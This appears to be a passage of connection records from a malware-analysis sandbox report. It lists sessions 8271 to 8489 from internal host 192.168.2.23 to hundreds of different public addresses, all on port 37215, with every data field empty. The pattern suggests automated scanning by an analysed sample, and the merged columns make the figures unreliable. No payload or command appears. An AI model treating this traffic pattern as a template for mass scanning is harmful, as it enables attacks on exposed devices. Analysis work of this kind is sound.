                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8271192.168.2.234148241.230.108.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8272192.168.2.2346800157.29.20.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8273192.168.2.2346668157.53.6.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8274192.168.2.233677041.37.50.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8275192.168.2.233352441.246.68.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8276192.168.2.233895441.172.123.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8277192.168.2.233496841.225.229.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8278192.168.2.235609641.79.54.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8279192.168.2.2337416144.79.103.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8280192.168.2.2357886176.24.247.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8281192.168.2.2346120197.29.86.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8282192.168.2.233635241.176.245.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8283192.168.2.2345712197.181.184.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8284192.168.2.234593697.17.122.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8285192.168.2.2333954157.100.252.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8286192.168.2.2344256197.200.139.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8287192.168.2.2352622197.102.136.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8288192.168.2.2356180157.39.57.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8289192.168.2.2353308170.42.67.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8290192.168.2.233360499.99.34.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8291192.168.2.2344740149.160.65.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8292192.168.2.233490459.122.7.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8293192.168.2.234100041.106.198.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8294192.168.2.235554441.42.201.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8295192.168.2.2334182157.186.67.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8296192.168.2.235966634.66.234.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8297192.168.2.2347028197.105.121.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8298192.168.2.2333520157.129.220.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8299192.168.2.2336712197.179.0.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8300192.168.2.2354534157.239.236.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8301192.168.2.2355616197.111.141.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8302192.168.2.2334002157.130.116.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8303192.168.2.233998014.195.39.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8304192.168.2.235294241.63.225.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8305192.168.2.2345804157.239.47.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8306192.168.2.233919241.234.219.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8307192.168.2.2350946157.241.31.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8308192.168.2.2333616197.151.95.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8309192.168.2.2337228197.160.121.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8310192.168.2.2347670197.119.126.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8311192.168.2.2359864157.107.58.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8312192.168.2.2337154197.200.133.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8313192.168.2.2358254157.251.105.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8314192.168.2.2347282197.78.190.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8315192.168.2.235643841.116.80.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8316192.168.2.2360218115.97.67.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8317192.168.2.2339416197.149.80.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8318192.168.2.2351462129.186.24.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8319192.168.2.234806841.78.161.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8320192.168.2.2348912157.68.110.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8321192.168.2.2348766157.58.233.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8322192.168.2.2359406157.177.16.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8323192.168.2.23358549.120.230.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8324192.168.2.2354062197.105.133.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8325192.168.2.2344384173.54.64.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8326192.168.2.235478641.135.252.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8327192.168.2.234280241.180.68.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8328192.168.2.233512420.219.115.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8329192.168.2.2359986197.72.134.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8330192.168.2.2344506194.95.53.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8331192.168.2.2334660157.136.73.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8332192.168.2.233766239.224.225.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8333192.168.2.2333264157.108.139.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8334192.168.2.2359326183.146.186.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8335192.168.2.236059041.173.187.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8336192.168.2.2344340197.51.162.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8337192.168.2.2343192157.203.18.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8338192.168.2.2339418157.227.193.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8339192.168.2.2345754157.212.136.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8340192.168.2.235459641.170.43.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8341192.168.2.235671641.166.61.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8342192.168.2.2348718166.225.113.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8343192.168.2.2333268197.99.82.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8344192.168.2.2349720197.25.101.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8345192.168.2.233613441.247.136.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8346192.168.2.2359584197.187.236.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8347192.168.2.2352638154.91.236.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8348192.168.2.235711275.17.185.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8349192.168.2.2347608197.116.229.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8350192.168.2.2334508157.255.68.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8351192.168.2.2357330157.225.56.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8352192.168.2.233312241.139.215.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8353192.168.2.2355428197.154.241.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8354192.168.2.2338636197.20.117.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8355192.168.2.2357782216.130.221.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8356192.168.2.234617241.67.96.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8357192.168.2.2355900197.215.247.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8358192.168.2.2354542157.124.240.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8359192.168.2.235104441.141.94.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8360192.168.2.233338268.129.92.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8361192.168.2.2346844197.84.184.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8362192.168.2.234969441.239.185.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8363192.168.2.234477641.81.74.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8364192.168.2.2345048157.42.29.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8365192.168.2.233504641.151.20.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8366192.168.2.2358968196.142.103.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8367192.168.2.235675641.173.33.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8368192.168.2.2336878197.153.245.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8369192.168.2.2342732168.176.145.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8370192.168.2.2343722108.187.79.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8371192.168.2.2350242157.193.195.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8372192.168.2.2346166153.131.104.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8373192.168.2.234018054.150.219.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8374192.168.2.2336608157.126.241.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8375192.168.2.234462641.225.229.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8376192.168.2.2353516197.27.225.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8377192.168.2.233314819.155.93.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8378192.168.2.2348770197.137.233.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8379192.168.2.2334492157.210.0.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8380192.168.2.2337036197.229.245.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8381192.168.2.2340022191.130.91.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8382192.168.2.2338188157.124.79.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8383192.168.2.235013041.76.148.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8384192.168.2.235477641.127.217.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8385192.168.2.2355580197.140.206.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8386192.168.2.2338358190.182.139.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8387192.168.2.2338218157.21.164.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8388192.168.2.2350166157.149.252.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8389192.168.2.2340270197.99.197.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8390192.168.2.2333212197.127.206.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8391192.168.2.235313841.241.99.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8392192.168.2.2359238161.149.140.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8393192.168.2.2358660133.91.12.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8394192.168.2.234526472.54.194.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8395192.168.2.235864840.99.15.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8396192.168.2.2360560184.74.67.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8397192.168.2.233701441.106.214.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8398192.168.2.2360722197.231.57.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8399192.168.2.234615465.229.194.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8400192.168.2.2350096157.84.246.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8401192.168.2.2354016197.137.167.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8402192.168.2.234905084.218.220.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8403192.168.2.2356962197.154.19.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8404192.168.2.234663241.116.222.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8405192.168.2.2353916107.91.184.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8406192.168.2.2352358157.13.72.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8407192.168.2.233670465.229.21.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8408192.168.2.2352520176.183.206.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8409192.168.2.2355518197.119.200.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8410192.168.2.236009041.45.132.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8411192.168.2.2360232197.112.99.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8412192.168.2.235749841.103.35.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8413192.168.2.2334470197.121.169.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8414192.168.2.2336492157.12.127.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8415192.168.2.2339776187.151.207.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8416192.168.2.2348596199.47.238.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8417192.168.2.234461441.167.186.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8418192.168.2.234492641.166.5.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8419192.168.2.2352118197.197.64.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8420192.168.2.233447423.49.82.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8421192.168.2.233336023.230.117.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8422192.168.2.233556841.182.230.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8423192.168.2.2357672125.168.162.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8424192.168.2.2342166197.34.111.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8425192.168.2.2356490197.84.231.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8426192.168.2.234332441.211.239.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8427192.168.2.2344096157.197.70.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8428192.168.2.235638041.135.98.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8429192.168.2.2341800197.72.138.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8430192.168.2.233562441.227.207.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8431192.168.2.235567641.73.238.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8432192.168.2.234739041.222.160.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8433192.168.2.2349892157.159.29.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8434192.168.2.234337841.49.161.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8435192.168.2.2354648197.11.234.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8436192.168.2.2345484187.228.135.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8437192.168.2.2340966197.13.75.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8438192.168.2.2343362157.71.31.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8439192.168.2.2337102157.134.30.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8440192.168.2.2334062157.94.210.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8441192.168.2.235844041.116.39.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8442192.168.2.235442041.130.249.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8443192.168.2.2334104157.145.25.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8444192.168.2.234686641.39.133.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8445192.168.2.2357120197.96.225.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8446192.168.2.233464841.115.204.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8447192.168.2.235417841.195.198.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8448192.168.2.233313041.209.48.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8449192.168.2.2342510157.78.234.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8450192.168.2.2339516197.155.41.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8451192.168.2.2339606157.11.29.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8452192.168.2.2337646157.121.210.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8453192.168.2.2349550171.113.41.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8454192.168.2.234934041.136.191.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8455192.168.2.2341794197.217.222.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8456192.168.2.235074843.255.45.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8457192.168.2.233611641.27.140.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8458192.168.2.2360778157.94.4.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8459192.168.2.2351764157.213.226.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8460192.168.2.2340584157.155.33.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8461192.168.2.2356424117.29.91.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8462192.168.2.2351154113.216.151.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8463192.168.2.234051025.194.65.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8464192.168.2.2349204157.100.150.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8465192.168.2.2337276197.239.130.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8466192.168.2.2344882197.189.84.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8467192.168.2.235599266.18.219.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8468192.168.2.235698641.102.31.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8469192.168.2.236062041.40.134.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8470192.168.2.2340152106.100.208.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8471192.168.2.233446241.27.136.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8472192.168.2.2347564197.247.55.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8473192.168.2.235777641.211.186.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8474192.168.2.233763257.13.224.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8475192.168.2.233677453.192.147.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8476192.168.2.233397441.138.73.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8477192.168.2.2339232157.116.233.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8478192.168.2.2343618157.69.227.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8479192.168.2.2354448157.127.248.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8480192.168.2.2353450157.214.43.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8481192.168.2.2360692157.174.127.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8482192.168.2.2360110194.67.226.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8483192.168.2.235143441.44.128.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8484192.168.2.234888641.61.244.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8485192.168.2.2344462157.52.123.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8486192.168.2.2357642197.7.63.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8487192.168.2.2337942197.86.253.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8488192.168.2.2337572183.169.20.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8489192.168.2.234207293.148.159.7837215
